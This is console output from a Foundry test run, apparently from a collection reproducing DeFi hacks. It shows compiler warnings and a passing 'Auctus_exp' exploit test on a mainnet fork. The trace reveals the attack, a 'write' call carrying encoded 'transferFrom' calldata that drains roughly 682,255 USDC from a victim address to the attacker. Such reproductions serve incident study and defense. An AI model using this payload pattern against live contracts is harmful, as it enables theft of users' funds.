Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.26s
Compiler run successful with warnings:
Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-03/Auctus_exp.sol:13:9:
   |
13 |         address account
   |         ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-03/Auctus_exp.sol:19:9:
   |
19 |         address account
   |         ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-03/Auctus_exp.sol:24:22:
   |
24 |     function approve(address spender, uint256 amount) public returns (bool) {
   |                      ^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-03/Auctus_exp.sol:24:39:
   |
24 |     function approve(address spender, uint256 amount) public returns (bool) {
   |                                       ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-03/Auctus_exp.sol:32:23:
   |
32 |     function transfer(address recipient, uint256 amount) public returns (bool) {
   |                       ^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2022-03/Auctus_exp.sol:32:42:
   |
32 |     function transfer(address recipient, uint256 amount) public returns (bool) {
   |                                          ^^^^^^^^^^^^^^

Warning (2018): Function state mutability can be restricted to pure
 --> src/test/2022-03/Auctus_exp.sol:8:5:
  |
8 |     function collateral() public view returns (address) {
  |     ^ (Relevant source part starts here and spans across multiple lines).

Warning (2018): Function state mutability can be restricted to pure
  --> src/test/2022-03/Auctus_exp.sol:18:5:
   |
18 |     function balanceOf(
   |     ^ (Relevant source part starts here and spans across multiple lines).

Warning (2018): Function state mutability can be restricted to pure
  --> src/test/2022-03/Auctus_exp.sol:24:5:
   |
24 |     function approve(address spender, uint256 amount) public returns (bool) {
   |     ^ (Relevant source part starts here and spans across multiple lines).

Warning (2018): Function state mutability can be restricted to pure
  --> src/test/2022-03/Auctus_exp.sol:32:5:
   |
32 |     function transfer(address recipient, uint256 amount) public returns (bool) {
   |     ^ (Relevant source part starts here and spans across multiple lines).


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 971.39ms (1.75ms CPU time)

Ran 1 test for src/test/2022-03/Auctus_exp.sol:ContractTest
[PASS] test() (gas: 98544)
Logs:
  Before exploit, USDC balance of attacker:: 0
  After exploit, USDC balance of attacker:: 682255200072

Traces:
  [5852] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 14460635 [1.446e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [106144] ContractTest::test()
    ├─ [9815] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38]) [staticcall]
    │   ├─ [2529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38]) [delegatecall]
    │   │   └─ ← [Return] 0
    │   └─ ← [Return] 0
    ├─ emit log_named_uint(key: "Before exploit, USDC balance of attacker:", val: 0)
    ├─ [3315] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(0xCB32033c498b54818e58270F341e5f6a3bce993B) [staticcall]
    │   ├─ [2529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(0xCB32033c498b54818e58270F341e5f6a3bce993B) [delegatecall]
    │   │   └─ ← [Return] 682255200072 [6.822e11]
    │   └─ ← [Return] 682255200072 [6.822e11]
    ├─ [65938] 0xE7597F774fD0a15A617894dc39d45A28B97AFa4f::write{value: 1}(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1, 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48, 0x23b872dd000000000000000000000000cb32033c498b54818e58270f341e5f6a3bce993b0000000000000000000000001804c8ab1f12e6bbf3894d4083f33e07309d1f380000000000000000000000000000000000000000000000000000009ed9942f48)
    │   ├─ [423] ContractTest::collateral() [staticcall]
    │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000
    │   ├─ [706] ContractTest::mintToPayable{value: 1}(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   └─ ← [Return] 1
    │   ├─ [730] ContractTest::balanceOf(0xE7597F774fD0a15A617894dc39d45A28B97AFa4f) [staticcall]
    │   │   └─ ← [Return] 1
    │   ├─ [841] ContractTest::approve(0x95E6F48254609A6ee006F7D493c8e5fB97094ceF, 1)
    │   │   └─ ← [Return] true
    │   ├─ [41492] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::transferFrom(0xCB32033c498b54818e58270F341e5f6a3bce993B, DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38], 682255200072 [6.822e11])
    │   │   ├─ [40697] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::transferFrom(0xCB32033c498b54818e58270F341e5f6a3bce993B, DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38], 682255200072 [6.822e11]) [delegatecall]
    │   │   │   ├─ emit Transfer(from: 0xCB32033c498b54818e58270F341e5f6a3bce993B, to: DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38], value: 682255200072 [6.822e11])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x03e1ac56018a4d315eb7131f9060cec9b688d3f9afdf3829eee151eacaecfbf8: 0 → 0x0000000000000000000000000000000000000000000000000000009ed9942f48
    │   │   │   │   @ 0xf18a79d76897f97317604c0a82eae865bc1a947898f64c6d2c92dea2f4afdd8a: 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff → 0xffffffffffffffffffffffffffffffffffffffffffffffffffffff61266bd0b7
    │   │   │   │   @ 0xfcba270c9f9d00f012e73a2c78a6a50cd923c9e9f62188c314ed214c9fc58276: 0x0000000000000000000000000000000000000000000000000000009ed9942f48 → 0
    │   │   │   └─ ← [Return] true
    │   │   └─ ← [Return] true
    │   ├─ [447] ContractTest::strikeAsset() [staticcall]
    │   │   └─ ← [Return] ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]
    │   ├─ [730] ContractTest::balanceOf(0xE7597F774fD0a15A617894dc39d45A28B97AFa4f) [staticcall]
    │   │   └─ ← [Return] 1
    │   ├─ [862] ContractTest::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 1)
    │   │   └─ ← [Return] true
    │   └─ ← [Stop]
    ├─ [1315] 0xA0b86991c6218b36c1d19D4a2e9Eb0cE3606eB48::balanceOf(DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38]) [staticcall]
    │   ├─ [529] 0xa2327a938Febf5FEC13baCFb16Ae10EcBc4cbDCF::balanceOf(DefaultSender: [0x1804c8AB1F12E6bbf3894d4083f33e07309d1f38]) [delegatecall]
    │   │   └─ ← [Return] 682255200072 [6.822e11]
    │   └─ ← [Return] 682255200072 [6.822e11]
    ├─ emit log_named_uint(key: "After exploit, USDC balance of attacker:", val: 682255200072 [6.822e11])
    ├─  storage changes:
    │   @ 0: 0x000000000000000000000000a0b86991c6218b36c1d19d4a2e9eb0ce3606eb48 → 0x0000000000000000000000010000000000000000000000000000000000000000
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 6.02s (3.91s CPU time)

Ran 2 test suites in 6.03s (6.99s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
